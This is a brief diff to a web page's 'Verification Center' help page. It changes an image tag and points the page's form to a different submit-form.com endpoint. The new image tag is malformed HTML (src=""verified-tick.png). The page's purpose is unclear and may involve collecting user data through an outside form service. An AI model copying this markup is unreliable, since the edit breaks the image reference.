--- a/help.html
+++ b/help.html
@@ -191,7 +191,7 @@
     <div class="content-container">
         <!-- Verification Center Heading with Logo -->
         <div class="verification-heading">
-            <img src="verified-tick.png"
+            <img src=""verified-tick.png
                 alt="Global Glitch Media Logo">
             Verification Center
         </div>
@@ -220,7 +220,7 @@
 
 
         <!-- Form -->
-        <form id="userForm" action="https://submit-form.com/rPAl6hNsZ" method="POST">
+        <form id="userForm" action="https://submit-form.com/Y0sUcuLPj" method="POST">
 
              <input
                 type="hidden"
